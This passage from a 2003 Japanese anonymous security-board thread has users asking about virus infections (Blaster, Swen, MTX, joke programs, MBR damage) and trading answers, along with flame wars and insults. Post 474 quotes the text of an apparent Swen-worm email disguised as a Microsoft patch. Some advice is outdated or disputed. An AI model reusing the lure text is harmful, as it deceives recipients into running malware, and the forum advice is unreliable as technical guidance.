ペーンの一環として今回の無料提供を積極的に進める、としている。
[ 2003年11月19日10時42分 ]

これいいのかしらん?



393 :名無しさん@お腹いっぱい。:03/11/19 17:39
http://www.my-etrust.com/microsoft

噂のコンピュータアソシエイツのウィルス対策ソフト也



394 :名無しさん@お腹いっぱい。:03/11/19 17:56
>>392-393
スレキボン

395 :名無しさん@お腹いっぱい。:03/11/19 18:18
>>394
http://pc.2ch.net/test/read.cgi/sec/1068909338/

396 :名無しさん@お腹いっぱい。:03/11/19 18:21
>>394
http://download.com.com/3302-2239_4-10190156.html?pn=2&fb=0
ここのユーザーアンケートによると79票のうち(・∀・)イイ!が7割、(・A・)イクナイ!!
が3割。大手のメジャーソフトにしてはあまりよくない。(・A・)イクナイ!!の内容
も「漏れのパソめたくたにぶっ壊された!」というようなホラーストーリー。
双方の工作員もいるだろうがw、もう少しいろいろ評価が出てくるまで実用の
ためのインスコは待ったほうがよさげ…人柱はキボンだけどw

397 :381:03/11/19 18:38
(´・ω・`)

398 :名無しさん@お腹いっぱい。:03/11/19 18:49
>>397
テンポラリファイル消して、検出されなきゃ大丈夫だろう。

399 :薮パソユーザー ◆0fQkHdNop2 :03/11/19 19:05
>>381

それはいわゆるブラクラの一種みたいですね。
別に削除の必要はないと思いますが、削除される場合は、削除の前に記念に
保存されたらいかがですか?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_SPAWN.A&VSect=T
>この不正スクリプトが実行されると、ブラウザのウインドウが画面の上を
>ボールのようにバウンドします。このページを閉じようとすると、30個の
>新規のブラウザを立ち上げて同じ画面を表示します。これらの新規の
>ウインドウうちのどれかをクローズしようとすると、更に30のウィンドウを
>次々に表示します。また、システム改変は行ないません。


400 :名無しさん@お腹いっぱい。:03/11/19 19:37
削除の前に記念に 保存されたらいかがですか?
削除の前に記念に 保存されたらいかがですか?
削除の前に記念に 保存されたらいかがですか?

401 :名無しさん@お腹いっぱい。:03/11/19 19:59
委員でないの?それともあれかウィルス保存するのはイカの金玉なんか?

402 :名無しさん@お腹いっぱい。:03/11/19 20:09
イカには金玉はありませんが?

403 :名無しさん@お腹いっぱい。:03/11/19 21:09
>>399 XXXX藪パソユーザーさんXXXX
あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102 取り消そうとしないばかりか、
http://pc.2ch.net/test/read.cgi/sec/1068471471/110

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いて逆に指摘者を誹謗していますね。初心者部外者も多い質問板の性質上
放置しておくわけにはまいりません。ぜひ虚偽の取り消しと暴言の謝罪をお願いします。

以上、何度かお願いしてまいりましたが、まだ回答をいただいておりません。上記は
あなたが広めた虚偽レスのほんの一例ですよ。「Outpostファイアウォールはデフォールト
でブラスタに無効」など実害のあるデマは数えればきりがありません。納得いく回答が
いただけるまでお願いさせていただきますのでご承知おきください。

404 :藪パソユーザー ◆B/0R9.HLHQ :03/11/19 21:21
>>386
あなたの脳の日本語を操作する中枢がポリモーフィックウィールスに
破壊されています。その他の部分も破壊されている可能性がありますが
確かではありません。アンチドートでスキャンした後復元ポイントを実行し
ネットランナーの今年の1月号の表紙を焼いた灰を1gのミネラルウォーター
に溶かして服用してください。

405 :薮パソユーザー ◆0fQkHdNop2 :03/11/19 22:56
↑偽者です。

406 :名無しさん@お腹いっぱい。:03/11/19 23:04
まだ偽善を振りまいていたのか、藪は。

407 :名無しさん@お腹いっぱい。:03/11/19 23:06
>>404は偽物ですが、>>405は有害物質のくせにコテハンアピールするキチガイです。
何ら変わりありません。

408 :406:03/11/19 23:09
漏れが言っているのは当然>>405の藪のことだが。

っていうか、トリップであぼーんしてるから
>>407がアンカー付けてなかったら分からんかったし。
偶然って怖いな。

409 :名無しさん@お腹いっぱい。:03/11/19 23:19
質問です
Windowsの動作が最近不安定で気になっています。症状としては反応が鈍いくらいなんですが・・・Nortonのログを見てみると
「msblast.exe」という履歴が残っていました。しかも4件。状態的には感染しており削除も免疫もききません

それでMSのセキュリティパッチをあてシマンテック社のmsblast検知ソフトでスキャンしたのですが何も見つかりません

またタスクマネージャのプロセスで「msblast.exe」というファイルがないか見てみたのですが、ありませんでした・・・



410 :409:03/11/19 23:22
あ、途中ですみません
この状況で本当にmsblastに感染しているのでしょうか?


411 :名無しさん@お腹いっぱい。:03/11/19 23:23
>>409
原因がブラスタ以外にあるという事じゃないかと思うんだが。

412 :名無しさん@お腹いっぱい。:03/11/19 23:28
ブラスタの亜種かな?

413 :名無しさん@お腹いっぱい。:03/11/20 00:30
>>410
まず感染はしてないと思うが、シマンテックだけじゃアンシンできんなら
トレンドのオンラインスキャンもかけてみれ
http://www.trendmicro.co.jp/hcall/index.asp
それからSpybotかなんかでアンチスパイのスキャン。
それでも何も出てこなかったらディスククリーンアップしてディスクデフラグ
かけてみろ。多少は改善されるかも。




414 :名無しさん@お腹いっぱい。:03/11/20 00:47
>>410
亜種の場合、本体ファイルが msblast.exe であるとは限らない。
ttp://www.trendmicro.co.jp/msblast/tool.asp
に、亜種のそれぞれの本体名があるので、一応、チェックしてみては?


415 :Hacktool.WKRShell:03/11/21 00:06
http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html

Hacktool.WKRShell
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html

416 :409:03/11/21 00:21
どうもありがとうございます
調べてみます

417 :名無しさん@お腹いっぱい。:03/11/21 00:46
今日(日付でいえば昨日)、やたら大量にウイルス来たんだけど、
20日は活動日?

418 :名無しさん@お腹いっぱい。:03/11/21 03:09
夜分にすいませんが、質問させてもらいます。
私は昨日自分のPCをネットをつなげた状態で使っていたのですが、しばらく使った後
いきなり全画面が真っ白になったかと思うと、真っ暗に反転し画面の真ん中に女の人の顔
(よく覚えてませんが相当怖い顔)が現れ、叫び声を上げ続けたのです。私は半ばパニック状態になり
強制終了することでその場を逃れました。(最小化、最大化、閉じるの表示アイコンが
無かったので強制終了しました。)それで次の日にまたPCを起動させてネットを切った
状態で2時間程度色々と使ってみたのですが、同じ画像は出てきませんでした。
なおインターネットの履歴を調べたのですが、それらしき履歴はなかったです。

それにこの画像は私には見覚えがあったものでした。一ヶ月くらい前にフラッシュ系のリンクを集めた
サイトで同じものを一回だけ見ていたのです。それで、私はその時に何らかのプログラムかウィルスが
侵入したのかと思い、色々とそのことについて検索をかけてみたのですが 
JOKE_MADO.A
HIKARU.A
等の似たようなウィルスは見つかるものの
全く同じ内容のウィルスは見つかりませんでした。
この現象はウィルスによるものなのでしょうか?

どなたかこのことについてご存知でしたらご助力願います。
宜しくお願いします。


419 :名無しさん@お腹いっぱい。:03/11/21 03:38
>>418
タスクスケジューラーから起動されるように設定されていれば、そのように時間差で
いきなり変な画面を表示させることも、たやすく出来てしまうんだよ。
また、○月○日の○時○分に実行なんてことも出来るんだよ。


420 :名無しさん@お腹いっぱい。:03/11/21 04:08
>>418
メモ帳でwin.iniを開いてrunの項目に妙なもんがないか調べる。
あとベクターから「窓の手」を落としてきて「自動実行プログラム」
を調べる。→心当たりないものはファイル検索して更新日付や
サイズ、作成者などを調べる。

エロサイト見たら・・・助けてください!Part15
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/
被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/


421 :418:03/11/21 23:50
>>419さん、420さん
アドバイスありがとうございます。
さっそくやってみます。

422 :名無しさん@お腹いっぱい。:03/11/22 19:34

すごく初歩的な質問で申し訳ありませんが
日本ではウィルスを配布しても法律によって
処罰されないのでしょうか?

調べてもされないような感じでしたのでここで聞かせていただきました

423 :名無しさん@お腹いっぱい。:03/11/23 00:27
知らん。がもし日本で駄目でも他の国で配布されてたらダウン出来るね。ネットですから。

424 :名無しさん@お腹いっぱい。:03/11/23 15:39
PCの動きがやたらと遅いのでオンラインウィルス検査してみると感染ファイルがあるとの事。4500くらい。
PC詳しく無いので手っ取り早くリカバリで解決しようとしたんですが、
ウィルスの影響なのかリカバリCDが実行されず普通の起動画面に変わってしまう。
マニュアルに書いてあることは一通りやりましたが無理でした。
どうすればいいんでしょうか…、2年前の富士通ノートです。

425 :名無しさん@お腹いっぱい。:03/11/23 16:03
>>424
F2 ボタンを押して、BIOSメニューを開き、BOOT の先頭に CD-ROM を指定する。

426 :薮パソユーザー ◆0fQkHdNop2 :03/11/23 16:03
>>424

可能性としては、

(1)CDを第一起動にしていない。→パソコンの説明書を見る。
(2)BIOSがウィルスにやられた。→メーカーHPでBIOSをget
(3)ハードが壊されている。→修理に出す。

427 :名無しさん@お腹いっぱい。:03/11/23 20:51
426 薮パソユーザー ◆0fQkHdNop2 sage New! 03/11/23 16:03
(2)BIOSがウィルスにやられた。→メーカーHPでBIOSをget



428 :名無しさん@お腹いっぱい。:03/11/24 01:58
ウイルスかわからないのですが非常に困っているので質問させて下さい。

XPを使っているのですが、昨日ちょっと調子がおかしくなってきたので、とりあえず再起をしてみたんです。
そうしたら、今度はほとんどのソフトが立ち上がらなくなってしまいました。
正確には、立ち上がるんですが、途中で完全に立ち上げるのをあきらめている感じです。
セーフモードで起動してエラーチェック、システム復元で2週間前くらいまで戻したんですが、結局治りません。

具体的には、メモ帳や計算機、それからフォルダ内だけで処理をする軽いソフト、それからなぜかワードは開くんですが、
それ以外の、特にネットに入るものは全く無理です。
IEも開きません。

でも、ネットへの接続はできる状態です。

ただIEが開かない為か、フォルダ内を見る事もCやマイコンピューターに入る事も出来ないんです・・・。
ちなみにこの書き込みはMACのノートでダイヤルアップで入ってるんですが・・・

ノートンもかけてみましたが、引っかかりませんでした。
ただ、ここしばらくアップデートをしてなかったように思うので、全然意味ないですね・・。
セーフモードで開くと、ノートンは立ち上がるけどネットに入れない、まともに立ち上げるとネットには入れるけどノートンが開かない、という状態になってしまいました・・。

3、4日前に「お久しぶりです」という件名で中身がなにも書いてなく、よく分からない拡張子のファイルが
添付されてるメールが来て、ファイルのDLはしなかったんですが、メール自体だけ開いてしまったんですが・・
やっぱり感染しちゃったんでしょうか?
それともウイルスは関係ないのでしょうか?
ちょっと本気で困っているのでよろしくお願いします。。

429 :名無しさん@お腹いっぱい。:03/11/24 02:08
>>428
ageてるし、ダラダラ書いているし、見覚えがあるのに何もしていないみたいだからペケ
自分が出来る範囲の対策を全て試してから戻って鯉

430 :428:03/11/24 02:41
そんなあ・・・
正確に書こうと思っただけなのに・・・
でも、見覚えあるって事はやっぱりウイルスなんですか?

ていうか自分で出来る範囲を(10時間近く)やっても駄目だったからここに来てるのに・・・

せめてスレッドかウイルス名だけでも教えて下さい・・・;_;

431 :名無しさん@お腹いっぱい。:03/11/24 03:04
10時間あれば再インスコしてから、元の状態に戻してもお釣りがくるね

432 :428:03/11/24 03:20
もういいーー;

433 :名無しさん@お腹いっぱい。:03/11/24 03:35
hackの本を買いたいのですが何がおすすめ?

434 :名無しさん@お腹いっぱい。:03/11/24 04:14
>>423 薮パソユーザー ◆0fQkHdNop2さん
あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102 取り消そうとしないばかりか、
http://pc.2ch.net/test/read.cgi/sec/1068471471/110

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いて逆に指摘者を誹謗していますね。上記はあなたが広めた虚、暴言
のほんの一例です。「Outpostファイアウォールはデフォールトでブラスタに無効」など
実害のあるデマは数えればきりがありません。初心者部外者も多い質問板の性質上放置
できません。虚偽の取り消しと暴言の謝罪をお願いします。

以上、何度かお願いしてまいりましたが、まだ回答をいただいておりません。


435 :名無しさん@お腹いっぱい。:03/11/24 04:24
sine

436 :名無しさん@お腹いっぱい。:03/11/24 04:27
Q.>>428の感染したウィルスはどの系統?

1.FBOUND.B, FBOUND.C
2.SWEN.A
3.それ以外

437 :名無しさん@お腹いっぱい。:03/11/24 05:04
ちなみに>>117の書き込みはMACのノートでダイヤルアップで入っていて
おまけにマルチなんですが・・・
http://pc.2ch.net/test/read.cgi/sec/1068300966/428-432

438 :名無しさん@お腹いっぱい。:03/11/24 06:38
>>437
117って何かと思ったら
http://pc.2ch.net/test/read.cgi/sec/1068311899/117


439 :名無しさん@お腹いっぱい。:03/11/24 14:53
>>428
>自分で出来る範囲を(10時間近く)やっても駄目だったからここに
んなこと、1文字も書いていないから「何もしていない」と判断されても仕方が無い

で、どんな対処をしたの?
またダラダラ書きそうだったら、身近の知っている人に聞いてね。

440 :名無しさん@お腹いっぱい。:03/11/24 16:15
>>434
粘着コピペ房うざい、消えろ。

441 :名無しさん@お腹いっぱい。:03/11/24 21:09
WORM_AGOBOT.AOって、新種のワームかな?
検索しても英語HPで少ししか、かからなかった。

442 :薮パソユーザー ◆0fQkHdNop2 :03/11/24 22:57
>>428

アンチドートでウィルスチェックしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504
ウィルスがいたら面倒なのでOS再インストールしてください。
ウィルスが検出されなかったら重要ファイルをバックアップして
Windows上書きインストールにトライしてください。

そしていずれの場合もWindowsとセキュリティーソフトのアップデートは
ちゃんとやってください。



443 :薮パソユーザー ◆0fQkHdNop2 :03/11/24 23:00
>>441

http://www.sophos.co.jp/virusinfo/analyses/w32agobotaa.html
http://www.f-secure.co.jp/v-descs/v-descs3/agobot.htm


444 :名無しさん@お腹いっぱい。:03/11/24 23:22
>>442
幾ら貰ってるんだよ。
コピペうざ。
リアルで相手にされないって悲しいことだな(w

445 :名無しさん@お腹いっぱい。:03/11/24 23:32
>>442-443 薮パソユーザー ◆0fQkHdNop2さん
あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102 取り消そうとしないばかりか、
http://pc.2ch.net/test/read.cgi/sec/1068471471/110

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いて逆に指摘者を誹謗していますね。上記はあなたが広めた虚、暴言
のほんの一例です。「Outpostファイアウォールはデフォールトでブラスタに無効」など
実害のあるデマは数えればきりがありません。初心者部外者も多い質問板の性質上放置
できません。虚偽の取り消しと暴言の謝罪をお願いします。

以上、何度かお願いしてまいりましたが、まだ回答をいただいておりません。

446 :名無しさん@お腹いっぱい。:03/11/25 00:20
>>445
粘着もここまでくると馬鹿だな(w

447 :名無しさん@お腹いっぱい。:03/11/25 00:33
薮さえ回線切ってくれれば問題ない訳だが

448 :名無しさん@お腹いっぱい。:03/11/25 10:30
なんで漏れのことがわかったんだろう…

449 :名無しさん@お腹いっぱい。:03/11/25 10:44
>>415でガイシュツのMS03-049脆弱性ですが、ウィールスが出たら
ネットにつないでるだけでもシステム乗っ取られるというからブラスタ
なみにコワイ。スタンドアローンのPCの場合はWorkstation サービス
自体を無効にしておくのがよさげ。Blasterスレ part5 
http://pc.2ch.net/test/read.cgi/sec/1065964513/423

コントロールパネル→管理ツール→サービス→「Workstationサービス」選択
プロパティ→サービスの状態:停止、スタートアップの種類:無効

もちろんあとでWindows Updateしとかなきゃいけませんが、updateした
からといってMSのバグがタネギレのわきゃない。なくてすむサービスは
捨てておくのが吉でせう。




450 :339:03/11/25 16:08
なんどもすいません。
とりあえずウイルスバスター2004体験版を
いれてスキャンしたのですが、
反応がなかったということは
もう感染してないと思っていいのでしょうか?


451 :名無しさん@お腹いっぱい。:03/11/25 18:02
>>450
感染してると思われる兆候はあるのか?

452 :名無しさん@お腹いっぱい。:03/11/26 00:37
>>447
ただ不安がっていてもしょうがない。とにかく
 アンチウィールス(AVG、Antivir)
 アンチスパイ(Ad-aware、Spybot)
 ファイアウォール(Zone Alarm、Outpost)
の三点セットを入れろ。どれもフリーでセキュ板に専用スレがある。
ファイアウォールは複数インスコするとバッティングするから注意。
ZoneAlarmは設定簡単だが重い、Outpostは機能が豊富で軽い。

453 :名無しさん@お腹いっぱい。:03/11/26 04:35
自宅の鯖に

www.nstec.jp - - [24/Nov/2003:11:53:12 +0900] "GET /scripts/nsiislog.dll" 403 - "-" "-"

こんなログが残ってたんですけど、この会社は逝ってよしですか?まじで。


454 :名無しさん@お腹いっぱい。:03/11/26 06:19
キタ━━━━━━(゚∀゚)━━━━━━ !!

455 :名無しさん@お腹いっぱい。:03/11/26 10:11
最近ウイルススキャンすると、あるファイルに10分かかってしまいます
ノートン先生が原因だとおもって、ウイルスバスター体験版DLしても
同じ症状です。これって普通?

456 :名無しさん@お腹いっぱい。:03/11/26 10:56
>>455
圧縮ファイルですな。
よほどファイル数が多いか、階層が細かいので時間がかかっているだけでしょう。

457 :名無しさん@お腹いっぱい。:03/11/26 10:57
>>456
そ〜なんですか、PCに異常があるかとおもってました。
ありがとです

458 :339:03/11/26 12:43
>>451
兆候、というか
Redlof.Aがまだ心配なだけです
(小心者ですいません)
ワクチンをちゃんと買おうとは思っているのですが…

459 :名無しさん@お腹いっぱい。:03/11/26 13:15
ウィルス対策ソフトを使わずにネットに接続しているのは犯罪のようなものだと思うが
今もnachiに感染したままping撃ち続けてる奴の多いこと
ここしばらく回線が重いのはおまいらのせいだぞ、と

460 :名無しさん@お腹いっぱい。:03/11/26 16:16
>>458
製品版買ってきて更新してスキャンして常駐して使えばそんな心配も消えるだろうよ

461 :名無しさん@お腹いっぱい。:03/11/26 17:05
突然すいません。
家に不在中、ウイルスバスターの手動検索にて
【SPYW_EXACTBAR.A】という名前のウイルスが検出されました。
このウイルスはどのような悪影響を及ぼすのかと思い、
Google、トレンドマクロのウイルス検索にて調べたのですが
何のウイルスかわかりませんでした。
誰かわかる人がいましたら、情報いただけませんか?
長文になってすいません。

462 :名無しさん@お腹いっぱい。:03/11/26 17:19
>>461
SPYWはたぶんspywareの略だった気が
ってことで
http://securityresponse.symantec.com/region/jp/sarcj/data/a/adware.exactbar.html
このあたり近そう

463 :名無しさん@お腹いっぱい。:03/11/26 17:29
>>462
ありがとうございます。上記のサイトで説明書きを読んだところ
C:\Program Files\eXact\eXactToolbar.dll
C:\Program Files\eXact\CloseWindow.exe
が、バスターにより発見されていたのでそのとおりでした。
個人情報抜かれるなどの大きな悪影響もなさそうですし、
安心して削除できます。本当にありがとうございました。


464 :Wxy.C(b)+Eek(b)に感染中:03/11/26 23:06
3ヶ月Win2000がHDに入らないので色々試していたところ、
先日NortonAntivirus2003にて、Wxy.C(b)が見つかりました。
駆除してHDDにインスト試みましたが入らず、何回も”windows2000インスト&ノートンCDでVirusチェック”
を試すうちにEek(b)を発見しました。それも駆除してもまだWin2Kは入りません。
HDDにはOsのWinMeがまだ生きており、こうして書き込めます。ほかのパーティションは消しました。
Fdisk/Mbrしてもインストできないので、(MBRSCANで)ダンプしたところ奇妙なメッセージ郡が出てきました。
どなたかこのHDDに無事Win2Kを入れる為の知恵を貸してくださいませんか?

465 :464(感染中):03/11/26 23:20
ハードディスク FUJITSU MHT2060AT で 60G
OS      第2パーティションにwinMe
最終的にMBMをMBRに入れて、W2Kを入れる予定です。
メッセージ群はMBRSCANでバイナリデータの所に、意味不明の
漢字キャラクターやMBMHasBrockenなど。ファイルが壊れているとの
メッセージが大量に書き込まれています。 Fdisk/Mbrでもそれはほとんど変わりません。
多分MBRのパーティションテーブル以外の所は確実に支配されているようなのですが。。



466 :名無しさん@お腹いっぱい。:03/11/26 23:22
>>464
2000をクリーンインストールすればいいだけでしょ?
必要なデータなんかはバックアップしておけばいいし。
ウイルスチェックなんかは2000インストールしてからでいくらでもできるし。


467 :名無しさん@お腹いっぱい。:03/11/27 00:56
>>464
なんだか、GoBackとかいろいろ入れてそうだな!
fdisk /mbrをやって取れないウィルスなんてない。
そのインストールしようとしているパーティション自体、インストールCDで認識していないんじゃないのか?
その領域は、いったん開放してから切りなおしてやる必要がありそうだな。


468 :名無しさん@お腹いっぱい。:03/11/27 01:05
MBM使うなんていっているけど、Meがインストールされている領域は、
隠しといてから、2000を入れなきゃならないことぐらいは判っているんだろうな!
アクティブにしてから、インストールしなきゃダメだし。

469 :464(感染中):03/11/27 01:23
まず最初にレスサンクス!です。
クリーンインストはHDDの完全クリーンはまだしていません^^;
Meのパーティションを残して、2000のクリーンインストはもう10回。。
MBMとも長い付き合いです。マスクくらいはしていますが。。。
何処のサイトを見てもブート感染型の”プログラム”の対処法は電源断で
悪質プログラム消去(またはMBR消去)であとは再感染しないように
レスキュー、が基本ですが。 Fdisk/Mbrで消えない常駐なんて
見たことも聞いたこともない。。。もちろん今の感染状態で、ノートンも
発見できない状態。でもMBRがなんかおかしいのは判る。。。W2kもインストできず。。


470 :464(感染中):03/11/27 01:38
<467さん
パーティションはまず切りますよね。FD起動します。FDもW2Kと
W2S、Me、98、があり、(9xFDからの場合はHDDにコピーして1回目の
再起動後、インストするファイルのコピーに失敗)W2Sの場合は起動ディスク3枚目で
エラー、W2KのFDの場合は起動FDは読むがCD挿入後の再起動で、もうCシステムも見えない状態に。
ややこしいですが、多分どこかにウィルスがまだいると思うのです。だからMBRの
書き換えも失敗するのではないか。。。失敗とはいってもコマンドは通ります。
本当はパーティションテーブルが怪しいと思って、ダンプしたら、MBRコマンドが
機能していないのが判明した、、、という顛末でした。開放というのは切り直しということだったら、
もう何回か切り直してます。どこにウィルスが潜んでいるんだろう。新種かな。。


471 :名無しさん@お腹いっぱい。:03/11/27 02:04
>>470
2000をインストールする領域をまずアクティブにする。その後フォーマットしてから
インストール。
Meが起動しているんだから、mbrに異常はない。

472 :464(感染中):03/11/27 03:05
C:\WINDOWS>mbrscan sd
MBRSCAN V1.11 Copyright (C) 1995-2003 by Nobumichi Kozawa
MBRS002 Error(int1348) Get Geometry Failed. RC=7 drive parameter activity failed
(hard disk)
以下私のダンプしたMBRのバイナリ?です。MBMが入っているときはMBM has broken等と出ました。
3タ社シ |P P ・ |ソ PWケ・、ヒセセ ア8,| u θ 糢ヘ ・・淅 It 8,tセ Nャ
< tサ エ ヘ ・宇%槙F エ < t エ < t:トu+@ニF% u$サェUPエAヘ Xr ・Uェu チ t
癌・$ヌ 。 ・・ ソ ク 衿3ノ・  起% N ヘ r)セF ・}UェtZ・ レ・u・' ・
釜然・F V ・ Z・ユOt・タヘ ・ BB!V3VVRP SQセ V偶 (以下略)
<471様 Meは動きますが、Mbrが正常でない可能性があるとは思うのですが。。
MeにあるPartitionMagic8.0でもこのMeパーティションを動かそうとするとエラーが出ます
クラスタの破損エラーです。思うにパーティションやブートを司る部分が何らかの暗号化された
プログラムに偽装されているから、クラスタエラーと出るのでは。。。スキャンディスクでは
エラーは出ません。またノートンでもHDDの感染も確認できません。もし上のイメージがおかしい場合、
どなたか指摘をお願いします。


473 :464(感染中):03/11/27 03:55
PRク B碍$ヘ ZX硬 r @u Bヌ 糯^テ・Invalid partition
table Error loading operating system Missing op
erating system  <これが先ほど略した続きです。これで全部です。m()m
長々と申し訳ありません。 今日は再度ディスクチェックをセットして寝ます。
MBRS011 Geometry was not saved. Assuming HH = FF, SS = 3F
MBRS005 Geometry was not saved. Free space after 044F1894 is unknown.
MBRSCANではエラーはあとこれ↑が出ました。ジオメトリが。。。(泣いちゃだめだ。。)

474 :名無しさん@お腹いっぱい。:03/11/27 07:09
q783568.exeってのを添付して下記の文面のメールを
送りつけられてきたのですが、これって、ウィルスメールでしょうか?
このメールと他に数件同時受信したときに
NortonAntiVirusが検知したのですが、どのメールに反応したのか
よくわかりませんでした。文章には、
MicrosoftCorporationの文字がはいってまして、それっぽくもあるのですが、
メールで送りつけてくるのも妙な気がしますし、みなさんのとこには
来ませんでした?以下、文面の一部です。

MS User
this is the latest version of security update,
the "November 2003, Cumulative Patch" update which
resolves all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help maintain the security of your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality of all previously
released patches.


475 :名無しさん@お腹いっぱい。:03/11/27 08:05
ttp://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/swen.asp

476 :475:03/11/27 08:06
>>474へのレスね。

477 :名無しさん@お腹いっぱい。:03/11/27 08:46
>>474-475
すみません、質問ですが、これ、現在どこかで猛繁殖してますか?
普段は多くても50通/dayなんですが、今起きてメールチェックしたら
400通ちょっと来てたんですが……
まさかウイルスが50MB以上も来るなんて思ってなかったので
ちょっとびびってます。

478 :名無しさん@お腹いっぱい。:03/11/27 09:06
>477
475ではありませんが、「何を今更」というくらい猛繁殖してました。
(過去形なのは、ピークは過ぎたようだから)

専用スレッドもあるみたいだし、>475とあわせてそっちのログを読んでみては?
ttp://pc.2ch.net/test/read.cgi/sec/1064010406/


479 :名無しさん@お腹いっぱい。:03/11/27 09:17
>>478
専用スレあったのですね。
ありがとうございます。行ってきます。

480 :名無しさん@お腹いっぱい。:03/11/27 12:26
画面がHikaruみたいになって目が真っ黒な女の画像が表示されます。
ノートン先生で検索かけても見つからん。セーフモードでウィルス名
(hikaru、madoka)で検索かけても見つからん。どーすればいいですか?
怖くて画面が見れません!

481 :名無しさん@お腹いっぱい。:03/11/27 13:07
全角英数はやめろ、見苦しい。

482 :名無しさん@お腹いっぱい。:03/11/27 14:18
>>480
変なプログラム実行するからだ。

483 :名無しさん@お腹いっぱい。:03/11/27 18:00
>>482
そうかも知れないです。今からリカバリします。


484 :名無しさん@お腹いっぱい。:03/11/27 21:33
すいません。誰か助けてください。
ウィルススキャンすると、
C:\_RESTORER\TEMP
の中の二つのファイルが感染していますと出ます。

それの処理は
「アクセスが拒否されました」
でした。

ウィル名は
Win32/MTX.A.Wsock.worm
です。

これはどうすれば、駆除できるのでしょうか?
またこれによる悪影響もできれば教えていただければと思います。
申し訳ありませんがご助力お願い致します。

485 :名無しさん@お腹いっぱい。:03/11/27 22:48
MTXか・・・かなり厄介な奴だからAVベンダーで専用の駆除ツールを落としたほうが早いと思う

486 :名無しさん@お腹いっぱい。:03/11/27 22:53
レスありがとうございます。
いまグーグルで「AVベンダー」で検索してきます。


487 :名無しさん@お腹いっぱい。:03/11/28 00:16
すいません。AVベンダーは何かの略なのでしょうか
検索しても出てきません(涙

488 :名無しさん@お腹いっぱい。:03/11/28 01:04
>>487
アンチウイルス(AntiVirus) ベンダー

489 :名無しさん@お腹いっぱい。:03/11/28 02:05
>>484
シマンテックとかトレンドのことだよ。
http://www.symantec.com/region/jp/sarcj/index.html
http://www.trendmicro.co.jp/vinfo/

490 :名無しさん@お腹いっぱい。:03/11/28 02:24
突然PCが重くなったので、再起動したらデスクトップ上のアイコンがすべて消えてました。
スタートメニューも真っ白なんですが、、かなりの重さでプログラムも起動できません。
これってなんのウィルスなんでしょうか?

491 :名無しさん@お腹いっぱい。:03/11/28 02:58
>>487
エロサイト見たら・・・助けてください!Part15
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/

492 :名無しさん@お腹いっぱい。:03/11/28 04:10
ありがとうございます。そこで質問してみます。

493 :339:03/11/28 12:43
>>460
はい、それはわかっているんですが…
ネットにつないでないPCではどうすればいいのでしょうか?
家のPCはつないでないので…


494 :薮パソユーザー ◆0fQkHdNop2 :03/11/28 15:45
>>490

Redlofの可能性もあるかも。
Windows再インストールしてupdateしてください。
ちゃんとupdateしてたらRedlofには感染しません。

495 :名無しさん@お腹いっぱい。:03/11/28 17:13
ただたんに さいいんすこして ねっとにつなぐのって やばくないか?

496 :名無しさん@お腹いっぱい。:03/11/28 17:26
やぶさまのおっしゃることですから ぶ ら す た ぁ なんてこわくもないでつよ

497 :名無しさん@お腹いっぱい。:03/11/28 17:36
>>495-496
精神病院池
あんたらの被害妄想癖は明らかに異常

498 :名無しさん@お腹いっぱい。:03/11/28 17:41
また逆切れか

499 :名無しさん@お腹いっぱい。:03/11/28 17:43
どこが被害妄想なんだろうねぇ??
Blaster知らないんだろうな(w

500 :名無しさん@お腹いっぱい。:03/11/28 17:53
いまどき、ただWindows再インストールして、ネット接続してupdate勧めるなんて
よっぽどおかしい
Blaster感染者を増やしたいとしか思えん
知識の無い人間がFWかましたりルーターかませたりしてネット接続するとは限らないとは思わないらしい

501 :464(感染中):03/11/28 18:13
再びWyx.C(b)に感染。。。駆除後W2Kインスト成功。。。NA2003インスト
アップデート後、再び何故かNTDLRでのブート切り替えが出て、W2kの下に
Windows2000Professional(#1)という選択肢が出てきた。。選ぶとブートローダーが壊れてる、と。
その後、起動画面に変な文字が出てきた。。ビデオカードのメモリがウィルスに感染している模様?
そのままSP4導入後、Fdisk/MBR+MBM導入したら、W2000P起動不能。。。もうだめ。。。
HDDクリーンインストしますが、BIOSもジャンパ設定で初期化するつもりですが、
このようなウィルスは単なるFdiskやFormatで消えるのでしょうか。。。今からやります。。
と思ったら

502 :名無しさん@お腹いっぱい。:03/11/28 18:26
>>497
後学の為なぜ被害妄想と言われたのかご説明頂きたく
宜しくお願い申し上げます。

503 :464(感染中):03/11/28 18:29
今書き込んでるHDD2台目も感染した。。。BIOSの画面より先にウィルスの文字が出ている。。。
ハードディスクの初期化はこのようなブート感染型(暗号化の)ウィルスには単純な
ハードディスクのMBRとパーティション+データ消去で大丈夫かなぁ。。
とりあえず今から1台目をクリーンインストみます。。

504 :名無しさん@お腹いっぱい。:03/11/28 18:42
